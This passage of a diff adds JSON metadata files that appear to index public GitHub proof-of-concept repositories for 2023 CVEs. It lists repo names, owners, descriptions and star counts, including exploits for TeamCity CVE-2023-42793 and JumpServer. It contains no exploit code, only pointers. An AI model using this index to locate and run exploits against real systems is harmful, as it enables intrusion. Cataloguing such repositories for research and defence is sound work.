+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42222.json b/2023/CVE-2023-42222.json
new file mode 100644
index 0000000000..af378b97ae
--- /dev/null
+++ b/2023/CVE-2023-42222.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 697420617,
+ "name": "CVE-2023-42222",
+ "full_name": "itssixtyn3in\/CVE-2023-42222",
+ "owner": {
+ "login": "itssixtyn3in",
+ "id": 130003354,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130003354?v=4",
+ "html_url": "https:\/\/github.com\/itssixtyn3in"
+ },
+ "html_url": "https:\/\/github.com\/itssixtyn3in\/CVE-2023-42222",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-27T17:36:30Z",
+ "updated_at": "2024-01-07T10:55:15Z",
+ "pushed_at": "2023-09-27T17:51:20Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42283.json b/2023/CVE-2023-42283.json
new file mode 100644
index 0000000000..27754ca66a
--- /dev/null
+++ b/2023/CVE-2023-42283.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 712086997,
+ "name": "CVE-2023-42283",
+ "full_name": "andreysanyuk\/CVE-2023-42283",
+ "owner": {
+ "login": "andreysanyuk",
+ "id": 18166102,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18166102?v=4",
+ "html_url": "https:\/\/github.com\/andreysanyuk"
+ },
+ "html_url": "https:\/\/github.com\/andreysanyuk\/CVE-2023-42283",
+ "description": "Proof of concept for CVE-2023-42283 in Tyk Gateway",
+ "fork": false,
+ "created_at": "2023-10-30T19:05:41Z",
+ "updated_at": "2023-11-06T11:47:11Z",
+ "pushed_at": "2023-10-30T19:29:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42284.json b/2023/CVE-2023-42284.json
new file mode 100644
index 0000000000..3743d1004b
--- /dev/null
+++ b/2023/CVE-2023-42284.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 712094141,
+ "name": "CVE-2023-42284",
+ "full_name": "andreysanyuk\/CVE-2023-42284",
+ "owner": {
+ "login": "andreysanyuk",
+ "id": 18166102,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18166102?v=4",
+ "html_url": "https:\/\/github.com\/andreysanyuk"
+ },
+ "html_url": "https:\/\/github.com\/andreysanyuk\/CVE-2023-42284",
+ "description": " Proof of concept for CVE-2023-42284 in Tyk Gateway ",
+ "fork": false,
+ "created_at": "2023-10-30T19:24:48Z",
+ "updated_at": "2023-11-06T11:46:29Z",
+ "pushed_at": "2023-10-30T19:27:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42362.json b/2023/CVE-2023-42362.json
new file mode 100644
index 0000000000..453d31afb1
--- /dev/null
+++ b/2023/CVE-2023-42362.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 690513360,
+ "name": "CVE-2023-42362",
+ "full_name": "Mr-n0b3dy\/CVE-2023-42362",
+ "owner": {
+ "login": "Mr-n0b3dy",
+ "id": 144795381,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144795381?v=4",
+ "html_url": "https:\/\/github.com\/Mr-n0b3dy"
+ },
+ "html_url": "https:\/\/github.com\/Mr-n0b3dy\/CVE-2023-42362",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-12T10:46:12Z",
+ "updated_at": "2023-09-13T12:17:19Z",
+ "pushed_at": "2023-09-13T22:38:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42413.json b/2023/CVE-2023-42413.json
new file mode 100644
index 0000000000..6b021bf7dc
--- /dev/null
+++ b/2023/CVE-2023-42413.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 695761286,
+ "name": "cve-2023-42413",
+ "full_name": "chenghao-hao\/cve-2023-42413",
+ "owner": {
+ "login": "chenghao-hao",
+ "id": 73655831,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73655831?v=4",
+ "html_url": "https:\/\/github.com\/chenghao-hao"
+ },
+ "html_url": "https:\/\/github.com\/chenghao-hao\/cve-2023-42413",
+ "description": "ecology_9_sql ",
+ "fork": false,
+ "created_at": "2023-09-24T06:17:33Z",
+ "updated_at": "2023-09-24T06:17:34Z",
+ "pushed_at": "2023-09-24T06:17:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42426.json b/2023/CVE-2023-42426.json
new file mode 100644
index 0000000000..c49cb85347
--- /dev/null
+++ b/2023/CVE-2023-42426.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 695777958,
+ "name": "CVE-2023-42426",
+ "full_name": "b0marek\/CVE-2023-42426",
+ "owner": {
+ "login": "b0marek",
+ "id": 144051679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4",
+ "html_url": "https:\/\/github.com\/b0marek"
+ },
+ "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-42426",
+ "description": "Repository for CVE-2023-42426 vulnerability. ",
+ "fork": false,
+ "created_at": "2023-09-24T07:34:05Z",
+ "updated_at": "2023-09-24T07:53:46Z",
+ "pushed_at": "2023-09-24T07:59:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42442.json b/2023/CVE-2023-42442.json
new file mode 100644
index 0000000000..d02a180ba1
--- /dev/null
+++ b/2023/CVE-2023-42442.json
@@ -0,0 +1,96 @@
+[
+ {
+ "id": 697118433,
+ "name": "CVE-2023-42442",
+ "full_name": "HolyGu\/CVE-2023-42442",
+ "owner": {
+ "login": "HolyGu",
+ "id": 28488437,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28488437?v=4",
+ "html_url": "https:\/\/github.com\/HolyGu"
+ },
+ "html_url": "https:\/\/github.com\/HolyGu\/CVE-2023-42442",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-27T05:09:20Z",
+ "updated_at": "2024-06-18T13:58:35Z",
+ "pushed_at": "2023-10-12T05:03:19Z",
+ "stargazers_count": 39,
+ "watchers_count": 39,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 39,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 704850042,
+ "name": "blackjump",
+ "full_name": "tarihub\/blackjump",
+ "owner": {
+ "login": "tarihub",
+ "id": 39155974,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39155974?v=4",
+ "html_url": "https:\/\/github.com\/tarihub"
+ },
+ "html_url": "https:\/\/github.com\/tarihub\/blackjump",
+ "description": "JumpServer 堡垒机未授权综合漏洞利用, Exploit for CVE-2023-42442 \/ CVE-2023-42820 \/ RCE 2021",
+ "fork": false,
+ "created_at": "2023-10-14T09:35:07Z",
+ "updated_at": "2024-06-25T15:40:11Z",
+ "pushed_at": "2024-05-16T07:42:00Z",
+ "stargazers_count": 172,
+ "watchers_count": 172,
+ "has_discussions": false,
+ "forks_count": 15,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-42442",
+ "cve-2023-42820",
+ "jumpserver"
+ ],
+ "visibility": "public",
+ "forks": 15,
+ "watchers": 172,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 707591805,
+ "name": "CVE-2023-42442",
+ "full_name": "C1ph3rX13\/CVE-2023-42442",
+ "owner": {
+ "login": "C1ph3rX13",
+ "id": 80873500,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4",
+ "html_url": "https:\/\/github.com\/C1ph3rX13"
+ },
+ "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-42442",
+ "description": "CVE-2023-42442",
+ "fork": false,
+ "created_at": "2023-10-20T08:33:17Z",
+ "updated_at": "2023-12-13T09:09:08Z",
+ "pushed_at": "2023-10-31T06:18:21Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42468.json b/2023/CVE-2023-42468.json
new file mode 100644
index 0000000000..5387faac18
--- /dev/null
+++ b/2023/CVE-2023-42468.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 686365585,
+ "name": "com.cutestudio.colordialer",
+ "full_name": "actuator\/com.cutestudio.colordialer",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/com.cutestudio.colordialer",
+ "description": "CVE-2023-42468",
+ "fork": false,
+ "created_at": "2023-09-02T14:48:07Z",
+ "updated_at": "2023-09-11T21:00:49Z",
+ "pushed_at": "2023-12-27T01:05:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-42468"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42469.json b/2023/CVE-2023-42469.json
new file mode 100644
index 0000000000..9ddb4b236f
--- /dev/null
+++ b/2023/CVE-2023-42469.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 686403164,
+ "name": "com.full.dialer.top.secure.encrypted",
+ "full_name": "actuator\/com.full.dialer.top.secure.encrypted",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/com.full.dialer.top.secure.encrypted",
+ "description": "CVE-2023-42469",
+ "fork": false,
+ "created_at": "2023-09-02T17:11:58Z",
+ "updated_at": "2023-09-11T20:59:02Z",
+ "pushed_at": "2023-12-26T22:35:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42470.json b/2023/CVE-2023-42470.json
new file mode 100644
index 0000000000..31a9dbe4a2
--- /dev/null
+++ b/2023/CVE-2023-42470.json
@@ -0,0 +1,35 @@
+[
+ {
+ "id": 679505307,
+ "name": "imou",
+ "full_name": "actuator\/imou",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/imou",
+ "description": "CVE-2023-42470 | CVE-2023-47353",
+ "fork": false,
+ "created_at": "2023-08-17T02:12:24Z",
+ "updated_at": "2024-01-10T23:47:33Z",
+ "pushed_at": "2024-01-10T23:33:56Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-42470",
+ "cve-2023-47353"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42471.json b/2023/CVE-2023-42471.json
new file mode 100644
index 0000000000..c991e80548
--- /dev/null
+++ b/2023/CVE-2023-42471.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 683940293,
+ "name": "wave.ai.browser",
+ "full_name": "actuator\/wave.ai.browser",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/wave.ai.browser",
+ "description": "CVE-2023-42471",
+ "fork": false,
+ "created_at": "2023-08-28T05:34:04Z",
+ "updated_at": "2023-09-11T20:59:38Z",
+ "pushed_at": "2023-11-14T14:45:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4278.json b/2023/CVE-2023-4278.json
new file mode 100644
index 0000000000..a502fb1d67
--- /dev/null
+++ b/2023/CVE-2023-4278.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 687060459,
+ "name": "CVE-2023-4278",
+ "full_name": "revan-ar\/CVE-2023-4278",
+ "owner": {
+ "login": "revan-ar",
+ "id": 45234012,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45234012?v=4",
+ "html_url": "https:\/\/github.com\/revan-ar"
+ },
+ "html_url": "https:\/\/github.com\/revan-ar\/CVE-2023-4278",
+ "description": "Wordpress Plugin Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation.",
+ "fork": false,
+ "created_at": "2023-09-04T14:16:32Z",
+ "updated_at": "2024-03-21T15:02:13Z",
+ "pushed_at": "2023-09-04T17:01:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42789.json b/2023/CVE-2023-42789.json
new file mode 100644
index 0000000000..69ede4c882
--- /dev/null
+++ b/2023/CVE-2023-42789.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 778714358,
+ "name": "CVE-2023-42789",
+ "full_name": "jhonnybonny\/CVE-2023-42789",
+ "owner": {
+ "login": "jhonnybonny",
+ "id": 87495218,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87495218?v=4",
+ "html_url": "https:\/\/github.com\/jhonnybonny"
+ },
+ "html_url": "https:\/\/github.com\/jhonnybonny\/CVE-2023-42789",
+ "description": "Check CVE-2023-42789 ",
+ "fork": false,
+ "created_at": "2024-03-28T08:59:12Z",
+ "updated_at": "2024-03-28T09:03:10Z",
+ "pushed_at": "2024-03-28T09:10:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4279.json b/2023/CVE-2023-4279.json
new file mode 100644
index 0000000000..0094ba388a
--- /dev/null
+++ b/2023/CVE-2023-4279.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 695790223,
+ "name": "CVE-2023-4279",
+ "full_name": "b0marek\/CVE-2023-4279",
+ "owner": {
+ "login": "b0marek",
+ "id": 144051679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4",
+ "html_url": "https:\/\/github.com\/b0marek"
+ },
+ "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4279",
+ "description": "Repository for CVE-2023-4279 vulnerability. ",
+ "fork": false,
+ "created_at": "2023-09-24T08:26:37Z",
+ "updated_at": "2023-09-24T08:26:37Z",
+ "pushed_at": "2023-09-24T08:35:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42793.json b/2023/CVE-2023-42793.json
new file mode 100644
index 0000000000..4582ca228e
--- /dev/null
+++ b/2023/CVE-2023-42793.json
@@ -0,0 +1,227 @@
+[
+ {
+ "id": 698097705,
+ "name": "CVE-2023-42793",
+ "full_name": "H454NSec\/CVE-2023-42793",
+ "owner": {
+ "login": "H454NSec",
+ "id": 127287794,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127287794?v=4",
+ "html_url": "https:\/\/github.com\/H454NSec"
+ },
+ "html_url": "https:\/\/github.com\/H454NSec\/CVE-2023-42793",
+ "description": "JetBrains TeamCity Authentication Bypass CVE-2023-42793 Exploit",
+ "fork": false,
+ "created_at": "2023-09-29T06:43:35Z",
+ "updated_at": "2024-06-25T20:14:45Z",
+ "pushed_at": "2024-05-22T16:07:18Z",
+ "stargazers_count": 43,
+ "watchers_count": 43,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-42793",
+ "exploit",
+ "poc",
+ "teamcity"
+ ],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 43,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 701008513,
+ "name": "CVE-2023-42793",
+ "full_name": "Zenmovie\/CVE-2023-42793",
+ "owner": {
+ "login": "Zenmovie",
+ "id": 98185655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98185655?v=4",
+ "html_url": "https:\/\/github.com\/Zenmovie"
+ },
+ "html_url": "https:\/\/github.com\/Zenmovie\/CVE-2023-42793",
+ "description": "PoC of CVE-2023-42793",
+ "fork": false,
+ "created_at": "2023-10-05T18:12:25Z",
+ "updated_at": "2024-05-15T00:29:40Z",
+ "pushed_at": "2023-10-11T11:40:05Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 740232498,
+ "name": "CVE-2023-42793_POC",
+ "full_name": "johnossawy\/CVE-2023-42793_POC",
+ "owner": {
+ "login": "johnossawy",
+ "id": 78561981,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78561981?v=4",
+ "html_url": "https:\/\/github.com\/johnossawy"
+ },
+ "html_url": "https:\/\/github.com\/johnossawy\/CVE-2023-42793_POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-07T22:29:18Z",
+ "updated_at": "2024-01-08T18:21:55Z",
+ "pushed_at": "2024-01-08T18:21:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 743548847,
+ "name": "GhostTown",
+ "full_name": "StanleyJobsonAU\/GhostTown",
+ "owner": {
+ "login": "StanleyJobsonAU",
+ "id": 123927299,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123927299?v=4",
+ "html_url": "https:\/\/github.com\/StanleyJobsonAU"
+ },
+ "html_url": "https:\/\/github.com\/StanleyJobsonAU\/GhostTown",
+ "description": "Proof of Concept script to exploit CVE-2023-42793 (TeamCity)",
+ "fork": false,
+ "created_at": "2024-01-15T13:25:49Z",
+ "updated_at": "2024-02-25T06:43:21Z",
+ "pushed_at": "2024-01-15T13:26:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 789764349,
+ "name": "CVE-2023-42793",
+ "full_name": "hotplugin0x01\/CVE-2023-42793",
+ "owner": {
+ "login": "hotplugin0x01",
+ "id": 57496383,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57496383?v=4",
+ "html_url": "https:\/\/github.com\/hotplugin0x01"
+ },
+ "html_url": "https:\/\/github.com\/hotplugin0x01\/CVE-2023-42793",
+ "description": "JetBrains TeamCity Unauthenticated Remote Code Execution - Python3 Implementation",
+ "fork": false,
+ "created_at": "2024-04-21T13:52:28Z",
+ "updated_at": "2024-05-06T10:15:51Z",
+ "pushed_at": "2024-05-06T10:15:48Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 791394288,
+ "name": "CVE-2023-42793",
+ "full_name": "Zyad-Elsayed\/CVE-2023-42793",
+ "owner": {
+ "login": "Zyad-Elsayed",
+ "id": 52281871,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52281871?v=4",
+ "html_url": "https:\/\/github.com\/Zyad-Elsayed"
+ },
+ "html_url": "https:\/\/github.com\/Zyad-Elsayed\/CVE-2023-42793",
+ "description": "JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE), CVE-2023-42793",
+ "fork": false,
+ "created_at": "2024-04-24T16:33:20Z",
+ "updated_at": "2024-06-22T20:01:52Z",
+ "pushed_at": "2024-04-24T23:10:27Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-42793",
+ "exploit",
+ "htb",
+ "jetbrains",
+ "poc",
+ "rce",
+ "runner",
+ "shell",
+ "teamcity"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 806358142,
+ "name": "CVE-2023-42793",
+ "full_name": "junnythemarksman\/CVE-2023-42793",
+ "owner": {
+ "login": "junnythemarksman",
+ "id": 20056452,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20056452?v=4",
+ "html_url": "https:\/\/github.com\/junnythemarksman"
+ },
+ "html_url": "https:\/\/github.com\/junnythemarksman\/CVE-2023-42793",
+ "description": "TeamCity CVE-2023-42793 exploit written in Rust",
+ "fork": false,
+ "created_at": "2024-05-27T03:31:57Z",
+ "updated_at": "2024-05-27T05:38:39Z",
+ "pushed_at": "2024-05-27T05:38:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4281.json b/2023/CVE-2023-4281.json
new file mode 100644
index 0000000000..9f5a12ea93
--- /dev/null
+++ b/2023/CVE-2023-4281.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 695848699,
+ "name": "CVE-2023-4281",
+ "full_name": "b0marek\/CVE-2023-4281",
+ "owner": {
+ "login": "b0marek",
+ "id": 144051679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4",
+ "html_url": "https:\/\/github.com\/b0marek"
+ },
+ "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4281",
+ "description": "Repository for CVE-2023-4281 vulnerability. ",
+ "fork": false,
+ "created_at": "2023-09-24T12:21:19Z",
+ "updated_at": "2023-09-24T12:21:19Z",
+ "pushed_at": "2023-09-24T12:27:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42819.json b/2023/CVE-2023-42819.json
new file mode 100644
index 0000000000..617a4332c9
--- /dev/null
+++ b/2023/CVE-2023-42819.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 703955293,
+ "name": "CVE-2023-42819",
+ "full_name": "C1ph3rX13\/CVE-2023-42819",
+ "owner": {
+ "login": "C1ph3rX13",
+ "id": 80873500,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4",
+ "html_url": "https:\/\/github.com\/C1ph3rX13"
+ },
+ "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-42819",
+ "description": "CVE-2023-42819",
+ "fork": false,
+ "created_at": "2023-10-12T08:45:46Z",
+ "updated_at": "2023-11-16T01:31:26Z",
+ "pushed_at": "2023-12-28T07:05:46Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42820.json b/2023/CVE-2023-42820.json
new file mode 100644
index 0000000000..ce5ae62a41
--- /dev/null
+++ b/2023/CVE-2023-42820.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 702854511,
+ "name": "CVE-2023-42820",
+ "full_name": "C1ph3rX13\/CVE-2023-42820",
+ "owner": {
+ "login": "C1ph3rX13",
+ "id": 80873500,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4",
+ "html_url": "https:\/\/github.com\/C1ph3rX13"
+ },
+ "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-42820",
+ "description": "CVE-2023-42820",
+ "fork": false,
+ "created_at": "2023-10-10T06:32:51Z",
+ "updated_at": "2024-06-21T00:11:36Z",
+ "pushed_at": "2024-04-03T09:57:07Z",
+ "stargazers_count": 56,
+ "watchers_count": 56,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 56,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 703323724,
+ "name": "cve-2023-42820",
+ "full_name": "Startr4ck\/cve-2023-42820",
+ "owner": {
+ "login": "Startr4ck",
+ "id": 53632236,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53632236?v=4",
+ "html_url": "https:\/\/github.com\/Startr4ck"
+ },
+ "html_url": "https:\/\/github.com\/Startr4ck\/cve-2023-42820",
+ "description": "JumpServer ",
+ "fork": false,
+ "created_at": "2023-10-11T03:15:30Z",
+ "updated_at": "2024-01-18T12:33:14Z",
+ "pushed_at": "2023-10-12T08:16:13Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
